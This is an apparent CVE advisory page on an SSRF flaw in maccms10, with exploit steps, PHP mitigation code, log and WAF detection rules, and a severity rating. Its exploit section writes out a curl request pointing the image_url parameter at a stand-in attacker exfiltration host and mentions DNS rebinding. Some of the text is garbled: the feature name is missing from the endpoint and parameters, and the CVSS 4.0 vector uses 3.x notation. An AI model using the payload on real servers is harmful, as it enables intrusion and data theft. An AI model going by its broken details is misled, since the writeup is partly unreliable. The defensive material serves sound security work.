How the CVE Works:
CVE-2025-28091 is a Server-Side Request Forgery (SSRF) vulnerability in maccms10 v2025.1000.4047. The flaw exists in the “Add ” functionality, where improper input validation allows attackers to craft malicious requests. By injecting manipulated URLs, an attacker can force the server to make unauthorized internal or external HTTP requests. This could lead to data exfiltration, internal network scanning, or abuse of trust relationships. The vulnerability stems from insufficient sanitization of user-supplied input in backend HTTP request handlers, which lets an attacker bypass access controls and interact with restricted systems.
DailyCVE Form:
Platform: maccms10
Version: v2025.1000.4047
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploit:
1. Craft a malicious POST request to `/admin//add` with a manipulated `image_url` parameter:
curl -X POST "http://target.com/admin//add" -d "=test&image_url=http://attacker.com/exfil"
2. Use Burp Suite to intercept and modify legitimate requests, replacing URLs with internal endpoints (e.g., `http://localhost/admin`).
3. Leverage DNS rebinding to bypass IP restrictions.
Mitigation:
1. Patch to maccms10 v2025.1000.4050 or later.
2. Implement input validation using a regex that whitelists allowed domains. The pattern must escape the dots and anchor the end of the host, otherwise `https://example.com.attacker.net` or `https://example.com@127.0.0.1/` would pass:
if (!preg_match('/^https?:\/\/(example\.com|trusted\.org)(\/|$)/i', $url)) { die("Invalid URL"); }
3. Disable unnecessary URL schemes (e.g., `file://`, `gopher://`).
4. Enforce network segmentation to restrict server outbound traffic.
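The regex above only checks the string; it does not stop a whitelisted hostname from resolving to an internal address, or from being re-resolved to one between the check and the request (the DNS rebinding case noted under Exploit). The following is an added example of a fuller check, not maccms10's own code: the `ALLOWED_HOSTS` list and the `image_url` parameter name are assumptions for illustration.

```php
<?php
// Added example, not maccms10 code. ALLOWED_HOSTS and image_url are assumed.
const ALLOWED_HOSTS = ['example.com', 'trusted.org'];

// Returns [url, host, port, ip] when every check passes, otherwise null.
function checkOutboundUrl(string $url): ?array
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    // http(s) only (rejects file://, gopher://, dict://) and no userinfo,
    // so http://example.com@127.0.0.1/ is refused too.
    if (!in_array($scheme, ['http', 'https'], true) || isset($p['user'])) {
        return null;
    }
    // Exact host match: "example.com.attacker.net" does not pass.
    $host = strtolower(rtrim($p['host'], '.'));
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        return null;
    }
    // Resolve once (A records); every answer must be a public address,
    // i.e. no loopback, private, link-local or reserved ranges.
    $ips = gethostbynamel($host);
    if (empty($ips)) {
        return null;
    }
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null;
        }
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    return [$url, $host, $port, $ips[0]];
}

// Pin cURL to the checked address so a later DNS answer (rebinding) cannot
// redirect the request; also refuse redirects and non-HTTP protocols.
$target = checkOutboundUrl($_POST['image_url'] ?? '');
if ($target === null) {
    http_response_code(400);
    exit('Invalid URL');
}
[$url, $host, $port, $ip] = $target;
$ch = curl_init($url);
curl_setopt_array($ch, [
    CURLOPT_RESOLVE        => ["$host:$port:$ip"],
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
]);
$body = curl_exec($ch);
```

Redirects are disabled on purpose: following a 3xx from the whitelisted host would otherwise reopen the path to an internal address.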
Detection:
1. Monitor access logs for requests to the vulnerable endpoint, and egress logs for unusual outbound requests to unknown domains. The exploit uses POST, so match both methods:
grep -E "(GET|POST) /admin//add" /var/log/nginx/access.log | awk '{print $7}'
2. Use WAF rules to block SSRF patterns. Note that `$args` only inspects the query string; an `image_url` sent in the POST body is not seen by this rule and needs a body-aware WAF or the application-level check above:
location /admin { if ($args ~ "image_url=http://internal") { return 403; } }
Analytics:
- CVSS 4.0: 9.6 (AV:N/AC:L/AT:N/PR:N/UI:N/S:C/C:H/I:H/A:H)
- Exploitability: High (PoC publicly available).
- Affected Systems: All maccms10 instances prior to v2025.1000.4050.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28091